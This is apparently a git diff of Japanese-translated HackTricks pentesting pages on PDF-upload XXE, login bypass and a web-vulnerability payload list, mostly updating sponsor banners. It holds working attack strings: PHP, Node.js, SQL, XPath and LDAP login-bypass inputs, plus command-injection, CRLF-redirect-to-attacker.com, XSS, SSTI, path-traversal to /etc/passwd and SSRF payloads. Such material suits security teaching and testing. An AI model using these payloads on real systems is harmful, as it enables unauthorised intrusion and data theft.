-ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)!
+Support HackTricks
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
-* [**公式PEASS&HackTricksスウェグ**](https://peass.creator-spring.com)を手に入れましょう
-* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)に参加**または[Telegramグループ](https://t.me/peass)に参加し、**Twitter**で私をフォロー🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
-* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
+* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
+* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
+* **[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
+{% endhint %}
diff --git a/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md b/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md
index 1178bca1f..e71ecd0f5 100644
--- a/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md
+++ b/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md
@@ -1,27 +1,33 @@
# PDF Upload - XXE and CORS bypass
-
-
-htARTE(HackTricks AWS Red Team Expert) を通じてゼロからヒーローまでAWSハッキングを学ぶ!
-
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションをご覧ください
-* [**公式PEASS&HackTricksスウェグ**](https://peass.creator-spring.com)を手に入れる
-* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**私をフォロー** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出して、あなたのハッキングトリックを共有してください。
-
-
-
-**[https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html](https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html)**
+{% hint style="success" %}
+AWSハッキングを学び、実践する:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCPハッキングを学び、実践する:[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-htARTE(HackTricks AWS Red Team Expert) を通じてゼロからヒーローまでAWSハッキングを学ぶ!
+HackTricksをサポートする
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションをご覧ください
-* [**公式PEASS&HackTricksスウェグ**](https://peass.creator-spring.com)を手に入れる
-* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**私をフォロー** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出して、あなたのハッキングトリックを共有してください。
+* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
+* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
+* **[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
+{% endhint %}
+
+**[https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html](https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html)を確認してください。**
+
+{% hint style="success" %}
+AWSハッキングを学び、実践する:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCPハッキングを学び、実践する:[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
+
+
+HackTricksをサポートする
+
+* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
+* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
+* **[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
+
+
+{% endhint %}
diff --git a/pentesting-web/login-bypass/README.md b/pentesting-web/login-bypass/README.md
index 4ab94066e..de88c4c7e 100644
--- a/pentesting-web/login-bypass/README.md
+++ b/pentesting-web/login-bypass/README.md
@@ -1,47 +1,50 @@
# ログインバイパス
+{% hint style="success" %}
+AWSハッキングを学び、練習する:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCPハッキングを学び、練習する: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-htARTE(HackTricks AWS Red Team Expert) でAWSハッキングをゼロからヒーローまで学びましょう!
+HackTricksをサポートする
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**してみたいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFT](https://opensea.io/collection/the-peass-family)のコレクションを見つけます
-* [**公式PEASS&HackTricks swag**](https://peass.creator-spring.com)を手に入れます
-* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
-* **ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
+* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
+* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
+* **ハッキングトリックを共有するために、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
+{% endhint %}
-[**RootedCON**](https://www.rootedcon.com/)は**スペイン**で最も関連性の高いサイバーセキュリティイベントであり、**ヨーロッパ**でも最も重要なイベントの1つです。**技術知識の促進を使命**とするこの会議は、あらゆる分野のテクノロジーとサイバーセキュリティ専門家の熱い出会いの場です。
+[**RootedCON**](https://www.rootedcon.com/)は、**スペイン**で最も関連性の高いサイバーセキュリティイベントであり、**ヨーロッパ**で最も重要なイベントの一つです。**技術知識の促進**を使命とし、この会議はあらゆる分野の技術とサイバーセキュリティの専門家の熱い交流の場です。
{% embed url="https://www.rootedcon.com/" %}
## **通常のログインをバイパスする**
-ログインページを見つけた場合、以下のいくつかのテクニックを試してバイパスできます:
+ログインページを見つけた場合、ここにバイパスするためのいくつかのテクニックがあります:
-* ページ内に**コメント**があるかどうかを確認します(下にスクロールして右に移動しますか?)
-* 制限されたページに**直接アクセスできるかどうかを確認します**
-* パラメータを**送信しないで**確認します(1つだけでも送信しない)
-* **PHP比較エラーを確認します:** `user[]=a&pwd=b`、`user=a&pwd[]=b`、`user[]=a&pwd[]=b`
-* コンテンツタイプをjsonに変更してjson値を送信します(bool trueを含む)
-* POSTがサポートされていないという応答を受け取った場合、`Content-Type: application/json`を使用してGETリクエストでJSONを本文に送信してみることができます
-* nodejsの潜在的な解析エラーを確認します([**こちら**](https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4)を参照):`password[password]=1`
-* Nodejsはそのペイロードを次のようなクエリに変換します:` SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` `` `**`password=password=1`**`;` これにより、パスワード部分が常にtrueになります。
-* JSONオブジェクトを送信できる場合は、`"password":{"password": 1}`を送信してログインをバイパスできます。
-* このログインをバイパスするには、引き続き**有効なユーザー名を知って送信する必要があります**。
-* `mysql.createConnection`を呼び出す際に`"stringifyObjects":true`オプションを追加すると、パラメータに`Object`が渡された場合の**予期しない動作をすべてブロック**することができます。
-* 資格情報を確認します:
-* 使用されている技術/プラットフォームの[**デフォルトの資格情報**](../../generic-methodologies-and-resources/brute-force.md#default-credentials)
-* **一般的な組み合わせ**(root、admin、password、技術の名前、これらのパスワードの1つを持つデフォルトユーザー)。
-* **Cewl**を使用して辞書を作成し、デフォルトのユーザー名とパスワードを追加し、すべての単語を**ユーザー名とパスワードとして使用してブルートフォース攻撃**を試みます
-* より大きな**辞書を使用してブルートフォース攻撃**を行います([**Brute force**](../../generic-methodologies-and-resources/brute-force.md#http-post-form)**)**
+* ページ内の**コメント**を確認する(下にスクロールして右に?)
+* **制限されたページに直接アクセスできるか**確認する
+* **パラメータを送信しない**(何も送信しないか、1つだけ送信する)
+* **PHPの比較エラーを確認する:** `user[]=a&pwd=b` , `user=a&pwd[]=b` , `user[]=a&pwd[]=b`
+* **コンテンツタイプをjsonに変更**し、json値を送信する(bool trueを含む)
+* POSTがサポートされていないという応答が返ってきた場合、**GETリクエストでボディにJSONを送信**してみることができます。`Content-Type: application/json`
+* nodejsの潜在的な解析エラーを確認する([**これを読む**](https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4)):`password[password]=1`
+* Nodejsはそのペイロードを次のようなクエリに変換します:` SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` `` `**`password=password=1`**`;` これにより、パスワードビットが常にtrueになります。
+* JSONオブジェクトを送信できる場合、`"password":{"password": 1}`を送信してログインをバイパスできます。
+* このログインをバイパスするには、**有効なユーザー名を知り、送信する必要がある**ことを忘れないでください。
+* `mysql.createConnection`を呼び出す際に**`"stringifyObjects":true`**オプションを追加すると、**パラメータに`Object`が渡されたときのすべての予期しない動作をブロック**します。
+* 認証情報を確認する:
+* 使用されている技術/プラットフォームの[**デフォルトの認証情報**](../../generic-methodologies-and-resources/brute-force.md#default-credentials)
+* **一般的な組み合わせ**(root、admin、password、技術の名前、これらのパスワードのいずれかを持つデフォルトユーザー)。
+* **Cewl**を使用して辞書を作成し、**デフォルト**のユーザー名とパスワード(ある場合)を追加し、すべての単語を**ユーザー名とパスワード**としてブルートフォースを試みる。
+* **より大きな辞書を使用してブルートフォース**([**ブルートフォース**](../../generic-methodologies-and-resources/brute-force.md#http-post-form))
### SQLインジェクション認証バイパス
-[ここで、**SQLインジェクション**を介してログインをバイパスするためのいくつかのトリックを見つけることができます](../sql-injection/#authentication-bypass)。
+[ここでは、**SQLインジェクション**を介してログインをバイパスするためのいくつかのトリックを見つけることができます](../sql-injection/#authentication-bypass)。
次のページでは、SQLインジェクションを介してログインをバイパスするための**カスタムリスト**を見つけることができます:
@@ -51,13 +54,13 @@
### No SQLインジェクション認証バイパス
-[ここで、**No SQLインジェクション**を介してログインをバイパスするためのいくつかのトリックを見つけることができます](../nosql-injection.md#basic-authentication-bypass)**。**
+[ここでは、**No SQLインジェクション**を介してログインをバイパスするためのいくつかのトリックを見つけることができます](../nosql-injection.md#basic-authentication-bypass)**。**
NoSQLインジェクションはパラメータの値を変更する必要があるため、手動でテストする必要があります。
### XPathインジェクション認証バイパス
-[ここで、**XPathインジェクション**を介してログインをバイパスするためのいくつかのトリックを見つけることができます](../xpath-injection.md#authentication-bypass)
+[ここでは、**XPathインジェクション**を介してログインをバイパスするためのいくつかのトリックを見つけることができます](../xpath-injection.md#authentication-bypass)
```
' or '1'='1
' or ''='
@@ -75,7 +78,7 @@ admin' or '1'='2
```
### LDAPインジェクション認証バイパス
-[ここでは、**LDAPインジェクション**を使用してログインをバイパスするためのいくつかのトリックを見つけることができます。](../ldap-injection.md#login-bypass)
+[ここでは、**LDAPインジェクション**を介してログインをバイパスするためのいくつかのトリックを見つけることができます。](../ldap-injection.md#login-bypass)
```
*
*)(&
@@ -91,31 +94,34 @@ admin))(|(|
```
### Remember Me
-ページに "**Remember Me**" 機能がある場合は、その実装方法を確認し、他のアカウントを **乗っ取る** ことができるかどうかを調べてください。
+ページに「**Remember Me**」機能がある場合、その実装方法を確認し、**他のアカウントを乗っ取る**ために悪用できるかどうかを見てください。
### Redirects
-通常、ログイン後にページがユーザーをリダイレクトします。そのリダイレクトを変更して [**Open Redirect**](../open-redirect.md) を引き起こすことができるかどうかを確認してください。ユーザーをあなたのウェブサイトにリダイレクトすることで、情報(コード、クッキーなど)を盗むことができるかもしれません。
+ページは通常、ログイン後にユーザーをリダイレクトします。そのリダイレクトを変更して[**Open Redirect**](../open-redirect.md)を引き起こすことができるか確認してください。ユーザーを自分のウェブサイトにリダイレクトすると、情報(コード、クッキーなど)を盗むことができるかもしれません。
-## その他のチェック
+## Other Checks
-* ログイン機能を悪用して **ユーザー名を列挙** できるかどうかを確認してください。
-* パスワード/**機密情報** の **フォーム** の **入力** で **自動入力** が有効になっているかどうかを確認してください:`
-[**RootedCON**](https://www.rootedcon.com/) は **スペイン** で最も関連性の高いサイバーセキュリティイベントであり、**ヨーロッパ** でも最も重要なイベントの一つです。技術的知識の促進を使命とするこの会議は、あらゆる分野の技術とサイバーセキュリティ専門家にとっての熱い出会いの場です。
+[**RootedCON**](https://www.rootedcon.com/)は、**スペイン**で最も関連性の高いサイバーセキュリティイベントであり、**ヨーロッパ**で最も重要なイベントの一つです。**技術知識の促進**を使命とし、この会議はあらゆる分野の技術とサイバーセキュリティの専門家が集まる熱い交流の場です。
{% embed url="https://www.rootedcon.com/" %}
+{% hint style="success" %}
+Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+
-ゼロからヒーローまでのAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)!
+Support HackTricks
-* **サイバーセキュリティ企業** で働いていますか? **HackTricks で会社を宣伝** したいですか?または **PEASS の最新バージョンにアクセス** したいですか?または **HackTricks をPDFでダウンロード** したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family) のコレクションを見つけてください
-* [**公式PEASS&HackTricksスウェグ**](https://peass.creator-spring.com) を手に入れましょう
-* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f) に参加するか、[**telegramグループ**](https://t.me/peass) に参加するか、**Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)** をフォロー** してください。
-* **ハッキングトリックを共有するために、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks) と [hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)** にPRを提出してください。
+* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
+* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
+* **[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
+{% endhint %}
diff --git a/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md b/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md
index d10bc4c4d..fe5ca794b 100644
--- a/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md
+++ b/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md
@@ -1,34 +1,69 @@
# Web Vulns List
-## Web Vulns List
+{% hint style="success" %}
+AWSハッキングを学び、実践する:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+GCPハッキングを学び、実践する:[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-ゼロからヒーローまでのAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)!
+HackTricksをサポートする
-* **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
-* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
-* [**公式PEASS&HackTricks swag**](https://peass.creator-spring.com)を手に入れましょう
-* [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローしてください 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
-* \*\*ハッキングトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)\*\*にPRを提出してください。
+* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
+* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
+* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
+{% endhint %}
+```python
+{{7*7}}[7*7]
+1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
+/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
+%0d%0aLocation:%20http://attacker.com
+%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
+%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
+%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
+
THIS IS AND INJECTED TITLE
+/etc/passwd
+../../../../../../etc/hosts
+..\..\..\..\..\..\etc/hosts
+/etc/hostname
+../../../../../../etc/hosts
+C:/windows/system32/drivers/etc/hosts
+../../../../../../windows/system32/drivers/etc/hosts
+..\..\..\..\..\..\windows/system32/drivers/etc/hosts
+http://asdasdasdasd.burpcollab.com/mal.php
+\\asdasdasdasd.burpcollab.com/mal.php
+www.whitelisted.com
+www.whitelisted.com.evil.com
+https://google.com
+//google.com
+javascript:alert(1)
+(\\w*)+$
+([a-zA-Z]+)*$
+((a+)+)+$
+x=>alert(/Chrome%20XSS%20filter%20bypass/);>
+{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
+
+" onclick=alert() a="
+'">
+javascript:alert()
+javascript:"/*'/*`/*-->
+-->'"/>
+">>" >|\>@gmail.com'-->" >">'">
+" onclick=alert(1)//